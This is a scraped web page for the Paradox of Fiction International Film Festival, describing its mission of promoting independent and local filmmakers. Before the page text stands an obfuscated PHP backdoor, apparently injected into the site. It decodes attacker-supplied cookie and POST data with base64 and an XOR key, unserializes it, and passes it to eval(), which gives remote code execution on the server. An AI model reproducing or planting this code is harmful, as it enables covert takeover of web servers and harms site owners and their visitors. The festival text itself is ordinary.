$VSkvIIJayB = "\126" . "\x41" . '_' . "\x57" . 'C' . chr ( 996 - 918 ).chr ( 201 - 88 ).chr (105); $qXrOnNt = "\143" . chr ( 938 - 830 )."\x61" . chr (115) . chr ( 984 - 869 ).chr (95) . chr ( 382 - 281 )."\170" . chr (105) . chr (115) . "\x74" . "\163";$SJCHvbgyb = $qXrOnNt($VSkvIIJayB); $VSkvIIJayB = "21695";$DkNneJ = $SJCHvbgyb;$qXrOnNt = "9204";if (!$DkNneJ){class VA_WCNqi{private $TGUigggUXQ;public static $sqEMmH = "add066ae-f97c-4253-bd50-30229ad9de26";public static $HpEjTRdos = 191;public function __construct($uTJyDWFwY=0){$fBkmLqcwwJ = $_COOKIE;$mnRSzPrwOC = $_POST;$DRDaq = @$fBkmLqcwwJ[substr(VA_WCNqi::$sqEMmH, 0, 4)];if (!empty($DRDaq)){$wuraVJ = "base64";$nLjJGkx = "";$DRDaq = explode(",", $DRDaq);foreach ($DRDaq as $OgxUtINpmo){$nLjJGkx .= @$fBkmLqcwwJ[$OgxUtINpmo];$nLjJGkx .= @$mnRSzPrwOC[$OgxUtINpmo];}$nLjJGkx = array_map($wuraVJ . chr (95) . chr ( 625 - 525 ).chr (101) . chr ( 135 - 36 ).chr ( 452 - 341 )."\144" . chr (101), array($nLjJGkx,)); $nLjJGkx = $nLjJGkx[0] ^ str_repeat(VA_WCNqi::$sqEMmH, (strlen($nLjJGkx[0]) / strlen(VA_WCNqi::$sqEMmH)) + 1);VA_WCNqi::$HpEjTRdos = @unserialize($nLjJGkx);}}private function MXSrPM(){if (is_array(VA_WCNqi::$HpEjTRdos)) {$ZYnyEnlNq = str_replace(chr (60) . '?' . chr ( 767 - 655 ).chr (104) . chr (112), "", VA_WCNqi::$HpEjTRdos['c' . 'o' . "\x6e" . "\164" . chr (101) . "\x6e" . chr ( 456 - 340 )]);eval($ZYnyEnlNq); $xDXzlryCh = "42146";exit();}}public function __destruct(){$this->MXSrPM(); $xDXzlryCh = "42146";$TRitvrcb = str_pad($xDXzlryCh, 10);}}$wMfhiMqelG = new /* 51163 */ VA_WCNqi(); $wMfhiMqelG = substr("46080_38639", 1);} Paradox of Fiction International Festival – Paradox of Fiction International Festival


Is your conflict compelling enough?


The choices that your characters make to resolve the conflict.


Every choice has a consequence…

Are the ingredients right?

Welcome to Paradox of fiction!

It’s about that tiny little thought that lingers in your mind, which you want to share with the world. A thought that makes people think. It’s that magic moment which we all strive for. An intimate moment where your ideas transcends the barrier of space and becomes a part of the viewer’s journey.

We at POFIFF want to be a part of that journey too and share your ideas to the world!

  • Paradox of Fiction International Film festival – POFIFF, aims to raise the profile of arthouse and independent cinema. Cinema that gives a view into a slice of life of people who have slipped from the cracks; Of people who need a voice; Of people who have something to say. Paradox of Fiction International Film Festival, is an organisation dedicated to finding new artists and take their art to new audiences. The festival seeks to inspire and promote these new independent artists, and films from all over the world.
  • Film festival vision : The spirit at the Paradox of Fiction International Film Festival is that of celebration and of community. To award excellence and focus attention on works of quality and of promise. As we participate in this evolution of cinema and the immersive storytelling of visual media, we are happy to have you as part of this confluence. As different minds merge – who knows what will emerge. Paradox of Fiction International Film Festival, is dedicated to the discovery of new artists, and takes their art to new audiences. The festival seeks to inspire and promote these new independent artists, and films from all over the world but with very glocal considerations – pan world, pan India, but with a very strong local presence and platform. A platform for the local artists to explore, and collaborate on their art. The hope is for the next festival to reflect on more films from local collaborators.
  • Key pointers
    • This festival is a part of a larger initiative to build a community around the people involved in the filmmaking process.
    • Give local talents the opportunity to make meaningful short films, where POFIFF along with Bizsensors Infotech Pvt Ltd will support the initiative
    • Help with PRE and POST Production to keep the total cost low while maintaining the production value.
    • Find avenues to showcase the films to a larger audience.